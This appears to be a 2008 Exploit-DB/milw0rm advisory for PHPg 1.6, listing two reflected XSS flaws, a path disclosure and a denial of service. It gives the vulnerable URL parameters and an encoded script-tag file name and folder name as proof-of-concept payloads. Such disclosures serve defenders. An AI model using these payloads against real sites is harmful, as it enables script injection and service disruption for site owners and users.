PHPg 1.6 XSSes, Path Disclosures, and DoS Vulnerability

vendor:

PHPg

by:

Anarchy Angel

7.5

CVSS

HIGH

Cross-site Scripting (XSS), Path Disclosure, Denial of Service (DoS)

79, 200, 400

CWE

Product Name: PHPg

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHPg 1.6 XSSes, Path Disclosures, and DoS Vulnerability

PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability. The first two XSSes can be triggered by sending a malicious URL to the application. The path disclosure can be triggered by sending a malicious file name to the application. The DoS can be triggered by creating a folder with a malicious name.

Mitigation:

Input validation should be used to prevent malicious input from being sent to the application. Additionally, the application should be configured to prevent users from creating folders with malicious names.

Source

Exploit-DB raw data:

PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability.
Home: http://black-dwarf.com
HS: http://www.hotscripts.com/Detailed/86225.html
Found by: Anarchy Angel - http://hha.zapto.org

Temp XSS: http://site.com/phpg/index.php?url="> [XSS]

Temp XSS: http://site/com/phpg/main-display-file.php?file= [XSS]

Path disclosure: http://site/com/phpg/main-display-file.php?file= [anarchything] .jpg<BR>
As long as the img/vid file does not exist you will get file path.

Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hacked% 20by% 20Anarchy% 20Angel% 22% 29% 3B% 3C% 2Fscript% 3E.jpg as its name "with out the spaces" Will give a path disclosure on the main page and a XSS when you view the file.

DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing.

# milw0rm.com [2008-12-21]